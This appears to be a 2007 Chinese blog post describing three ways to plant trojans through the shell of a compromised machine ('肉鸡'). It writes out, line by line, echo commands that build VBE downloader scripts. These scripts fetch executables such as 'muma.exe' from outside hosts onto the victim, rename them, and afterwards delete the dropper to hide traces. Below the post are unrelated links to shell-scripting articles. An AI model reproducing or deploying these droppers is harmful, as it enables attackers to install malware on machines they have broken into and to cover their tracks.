3种脚本挂马方式(SHELL中使用)

原创 2007年09月13日 19:56:00
这个方法也是很简单有效的,我们在得到的肉鸡SHELL里依次写入下面这些命令来创建一个VBE文件,代码如下:
echo with w:if .arguments.count^<2 then .quit:end if >xiazai.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>xiazai.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>xiazai.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>xiazai.vbe
这样就会在肉鸡中生成一个xiazai.vbe的文件,如下图是我演示的一个结果显示,我们通过DIR可以看到这个xiazai.vbe文件已经成功创建了。
现在我们只要输入c xianzai.vbe http://iceskysl.e2u.cc/server.exe   mtt.exe就可以把http://iceskysl.e2u.cc/server.exe这个地址下的这个server.exe下载到肉鸡中并且改名字为mtt.exe,目的达到,接着怎么做,我就不多说了!
★六★、利用iget.vbe法
这个方法同上面的那个差不多,只是写法不一样,具体的还是在肉鸡SHELL中写入下面的代码:
echo iLocal = LCase(W.Arguments(1)) >iget.vbe
echo iRemote = LCase(W.Arguments(0)) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
这样写好后就可以这样执行了c iget.vbe http://icesky.com/muma.exe mm.exe 就可以把http://icesky.com/muma.exe这个地址的程序muma.exe下载下来并且改名字为mm.exe。
★七★、利用Http网站vbe法
这个就是我们前面讲的那个Recton程序种植者所用的HTTP法下载的原理,我们在得到的肉鸡的SHELL里依次写入下面这些:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe
echo xPost.Open "GET","http://d.thec.cn/mygoit/readme.exe",0 >>dsa.vbe
echo xPost.Send() >>dsa.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe
echo sGet.Mode = 3 >>dsa.vbe
echo sGet.Type = 1 >>dsa.vbe
echo sGet.Open() >>dsa.vbe
echo sGet.Write(xPost.responseBody) >>dsa.vbe
echo sGet.SaveToFile "readme.exe",2 >>dsa.vbe
写好后执行:c dsa.vbe 就可以把你上面的那个地址("http://***.*/sample.exe,注意要换成你自己放程序的地址)下的文件下载下来了,最后同样别忘记了用del dsa.vbe删掉我们刚才写的那个文件哦!

 

常见挂马方式

  • 2011年12月21日 18:42
  • 4KB
  • 下载

shell 脚本中传递参数3种方法的比较

#!/bin/bash #extracting command text_text_text_line options as parameters help_info(){ echo "NA...

CentOS6.7下使用非root用户(普通用户)编译安装与配置mysql数据库并使用shell脚本定时任务方式实现mysql数据库服务随机自动启动

CentOS6.7下使用非root用户(普通用户)编译安装与配置mysql数据库并使用shell脚本定时任务方式实现mysql数据库服务随机自动启动 1.关于mysql? MySQL是一个关系型数...

Python与shell的3种交互方式介绍

概述 考虑这样一个问题,有hello.py脚本,输出”hello, world!”;有TestInput.py脚本,等待用户输入,然后打印用户输入的数据。那么,怎么样把hello.py输出内容发...

java 执行sql脚本的3种方式 (ant,ibatis,ScriptRunner)

ant:  java执行sql文件这个问题麻烦的地方在于解析sql脚本文件。所幸的是ant与 ibatis提供了这种实现。 package com.unmi;    ...

Shell脚本调试的几种方式

脚本调试的主要工作就是发现引发脚本错误的原因以及脚本源代码中定位错误行。归纳汇总了下,调试脚本时,我们可能会用到的几种方式,比如说:最简单的通过echo的方式,通过set -x的方式,比较高端一点的通...

c语言中调用shell脚本的三种方式

C程序调用shell脚本共有三种法子 :system()、popen()、exec系列函数call_exec1.c ,内容为: system() 不用你自己去产生进程,它已经封装了,直接加入自己的命...

多种shell脚本执行方式之间的区别

 多种shell脚本执行方式之间的区别 转载:http://emb.sunplusedu.com/answer/2013/0319/1142.h...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:3种脚本挂马方式(SHELL中使用)
举报原因:
原因补充:

(最多只允许输入30个字)